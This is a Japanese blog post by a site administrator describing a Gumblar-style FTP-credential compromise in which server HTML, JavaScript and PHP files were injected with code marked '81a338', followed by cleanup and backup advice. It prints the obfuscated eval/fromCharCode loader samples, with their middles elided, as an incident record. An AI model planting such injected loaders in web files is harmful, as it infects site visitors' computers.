WEBサイト改ざん被害

メルです。

かなり仕事を休んでしまったので
「さぁ、仕事!仕事!」と思いきや、
管理しているある企業のサーバーに
不振なFTPアクセスが・・・

アクセス元は、

など・・・。

これはやばいのでは?と思いながら
サーバーの中身を見ると、
なんと大量のファイルが改ざんにあっているではありませんか。

改竄されたページにアクセスすると訪問者のパソコンが
感染し、被害が広まると言うオマケ付き。

改竄されたファイルは、HTMLファイル、JavaScriptファイル、
一部PHPファイルで、<!–81a338–>、/*81a338*/から始まる
JavaScript、iframe などの埋め込みが特徴。

他にも81a338の代わりに0c0896や、ded509などの6桁の
英数字のものもあるようです。

状況から見て、
これは最近非常に被害が増えているパターンで
ガンブラーなどのウイルスやスパイウエアに感染し、
パソコンからFTP情報を搾取され、改竄されている
可能性が高い。

 

 

流石にこれはまずいので、
サイトを閉鎖し、クライアント企業に連絡。

全てのパソコンのウイルスチェックをしてもらい、
サーバー、FTPへのアクセス制限を行い、
全てのパスワードの変更と共に復旧作業に取り掛かることに。

因みに改ざん被害にあったファイルには以下のコードが追加されていました。

 

改ざんされたHTMLファイル

<!--81a338--><script type="text/javascript" language="javascript" >gakqf="s"+"p"+"li"+"t";srkjb=window;fpr="dy";txm=document;rcigwm="0x";kguirj=(5-3-1);try{++(txm.body)}catch(yymj){jpi=false;try{}catch(vji){jpi=21;}
if(1){crqv="17:5d:6c:65:5a:6b:60:66:65:17:6f:58:5c:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6f:58:5c:17:34:17:5b:66:5a:6c
     ・
     ・中略
     ・
5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:6f:58:5c:27:30:1f:20:32:4:1:74:4:1:74"[gakqf](":");}srkjb=crqv;cub=[];for(yghxc=22-20-2;-yghxc+1384!=0;yghxc+=1){mfeuzr=yghxc;if((0x19==031))cub+=String["fromCharCode"](eval(rcigwm+srkjb[1*mfeuzr])+0xa-kguirj);}rzosnt=eval;rzosnt(cub)}</script><!--/81a338-->

 

改ざんされたJavaScriptファイル

/*81a338*/
ragir="s"+"p"+"li"+"t";negu=window;zwh="dy";vqpoo=document;rauffm="0x";blye=(5-3-1);try{++(vqpoo.body)}catch(xdomas){jioz=false;try{}catch(dhncm){jioz=21;}
if(1){przkl="17:5d:6c:65:5a:6b:60:66:65:17:60:5d:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:
     ・
     ・中略
     ・
2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:60:5d:27:30:1f:20:32:4:1:74:4:1:74"[ragir](":");}negu=przkl;ljy=[];for(cahkv=22-20-2;-cahkv+1374!=0;cahkv+=1){lufim=cahkv;if((0x19==031))ljy+=String["fromCharCode"](eval(rauffm+negu[1*lufim])+0xa-blye);}klc=eval;klc(ljy)}
/*/81a338*/

 

改ざんされたPHPファイル

#81a338#
if(empty($qk)) {
$qk = "<script type=\"text/javascript\" language=\"javascript\" >gakqf=\"s\"+\"p\"+\"li\"+\"t\";srkjb=window;fpr=\"dy\";txm=document;rcigwm=\"0x\";kguirj=(5-3-1);try{++(txm.body)}catch(yymj){jpi=false;try{}catch(vji){jpi=21;}
if(1){crqv=\"17:5d:6c:65:5a:6b:60:66:65:17:6f:58:5c:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:
     ・
     ・中略
     ・
4:1:74:4:1:74\"[gakqf](\":\");}srkjb=crqv;cub=[];for(yghxc=22-20-2;-yghxc+1384!=0;yghxc+=1){mfeuzr=yghxc;if((0x19==031))cub+=String[\"fromCharCode\"](eval(rcigwm+srkjb[1*mfeuzr])+0xa-kguirj);}rzosnt=eval;rzosnt(cub)}</script>";
echo $qk;
}
#/81a338#

 

このサーバーには月商300万円のネットショップが入っていたので
スピード勝負。

結局なんだかんだで復旧までに丸1日かかってしまいましたが(笑

最近、CMSなどの脆弱性をついた攻撃や、
今回のようにパソコンから情報を搾取しての攻撃など、
非常に被害が広まっています。

またWEBサイトにアクセスするだけでも感染するものも
多数あります。

どこか遠い世界の出来事ではなく、
誰もがいつでも感染する可能性があります。

パソコンのセキュリティはしっかりと導入し、
まめにスキャンして、皆さんも気をつけて下さい。

 

 

— 10/3追記 —

 

このタイプの被害にあった場合の対処法は、
81a338で入れ子になっている部分の記述を削除するしかありません。

被害にあっている事に気付くのが遅いと、
数百から数千ものファイルが書き換えられているため、
手動でファイルを開いて削除していたら大変です。
日頃からサーバー内の全ファイルのバックアップを
まめに取っておく事をお勧めします。

バックアップさえあれば、FTPで一括上書きアップロードで対応できます。

 

 

この投稿は役に立ちましたか? 役に立った 役に立たなかった

 

ネットビジネス速報メールマガジン

 

メルのネットビジネス速報では、悪質高額塾などの被害が拡大しないように
新しい悪質販売者の情報が入り次第、速報でお伝えいたします。

Dreamweaver、Fireworks、PhotoshopなどのTipsやチュートリアルの紹介、
最新SEO情報、その他ネットビジネスに関する情報をいち早く配信しています。

お名前(必須)
メールアドレス(必須)

One Response to “WEBサイト改ざん被害”

  1. […] これは前回、WEBサイト改ざん被害の記事でも書きかましたが、 管理しているパソコンからFTPのパスワードを抜き取られて改竄されます。 […]

記事「WEBサイト改ざん被害」にコメントを残す

*

サブコンテンツ

危険な高額塾

タグ

LinkShaker 到達率 ブロック YouTube Maniax 2017 不正アクセス カスタマイズ ヤフオク ソフト 大園麗花 ヤフー 画像 エクスチェンジ トレンドキーワード 伊藤 歩 iphone moza RMT サイト改ざん IP ツイッター 短縮URL 管理画面 放射線 ping送信 株式会社A-ブログレス 日本語入力変換ソフト 大園式転売塾 ライブチャット リンクシェイカー 滑らか アクセス制限 デスクトップ 山下 High Concept Marketing アフィリエイト 人物 インフォトップ エディタ document.all サンタ 表示 新井浩 申請金ビジネス Google Maps API 復元 上位表示 掲示板 タイガーウイング 副業術 不労所得の神 PHP インペリアルゴールド アレックス ビジネス 脆弱性 マニュアル 伊藤 虎太郎 MT セキュリティ ブラクラ Line 81a338 Thunderbird テンプレート PPC 原田真 固定ページ functions.php DTD タスクバー 感染 配布 ping Baidu プロモーション 北川 雅嗣 JavaScript 背景 スムーズ 既得権益 getElementById やしろひろたみ followmatic ユーチューブマニアクス2017 ソース 切抜き 株式会社SRシステム Internet Explorer クラック IE MovableTYpe 出店料 マイクロソフト 秒速で1億円稼ぐ男 Windows 7 加工 バナー エクスプローラー クリックランキング メルマガ配信システム 情報商材 Login LockDown アクセスアップ 自動化 小笠原健一 レイアウト崩れ FireWorks がら空きビジネス ヤフーショッピング CS5 株式会社SRシステム 特定のメールアドレス SKナレッジ レイアウト インターネット アイコン フレンドシップメール 立体 石井匠 レタープレス 株式会社バンザイ 土屋ひろし 加藤 秀吉 Google Maps MasterCollection バイマ 百度 グラデーション 個人情報流出 Firefox wpXサーバー ライン レンタルサーバー 詐欺 クロスアフィリエイト プロファイル もざ トラフィック 大西良幸 音量アイコン ブラウザ 登録禁止 CGI force puzzle RSS Includes Pages ブルートフォースアタック 特権ビジネス ロリポップ 無料オファー @PAGES XHTML スクロール SEO 量産 ドメイン アフィ匠 自己アフィリ wp-login.php エキスパートメール 管理ツール せどり 株式会社WINGOOD ウインドウ 優先順位 パズル バイドゥー BBIZ バックアップ 個人情報 Extension Manager 久積篤史 クラウド入力機能 大園転売塾 ワードプレス WP 権利収入 ハート css ネットガレージ RSS office インターネットエクスプローラー FTP 比較 Diamond Affiliate Masters Program アレックス式ネオせどりスクール Cash on Wordpress 流出 フォローマティック ブロックポリシー SyntaxHighlighter ネットビジネス大全集 Youtube IBS 与沢翼 自己アフィリエイト やしろ塾 高額塾 ファビコン 短縮URLツール アンダーグラウンドメソッド スタイルシート ボタン Windows ブラシ SmoothScroll.js 池田純矢 KMSpico getElementByTagName 与沢翼×蝶乃舞 インターネットビジネススクール 自動 BUYMA 不正送信 無断送信 コピーボタン 伊藤塾 賢威 球体 Yahoo ソースコード シャンプー tool 転売大園塾 ツール 改ざん テーマ Ban Hammer WEB 無料 ぼかし 秀吉塾天下統一 株式会社Free Agent Style Chrome Favicon ざくざく君 Agency Business 改竄 マルウエア 詐欺組織 スマホ プラグイン トレンドアフィリエイト ライオンアフィリエイト 宮田麗花 アドセンス 切り抜き ウイルス android 伊藤虎太郎 explorer EC ネットビジネス最後の楽園 google 株式会社ニュース HTML4.0 ネットゲーム 関根義光 ムーバブルタイプ CS6 DOCTYPE twitter ネオヒルズアカデミー system メモ 村上省吾 KMS認証 クラウド変換 関根塾 スカイプ ECサイト wordpress 蝶乃舞 中山秀人 レビュー 高速ゲーム Tiger-Wing .htaccess 定型文 Wordpress Content Slide ネットビジネス アンダーグラウンドアフィリエイトクラブ Adobe postpost ネットショップ html Newpost Catch ランキング モザイク 三橋美仁

アーカイブ

エステトラブル

このページの先頭へ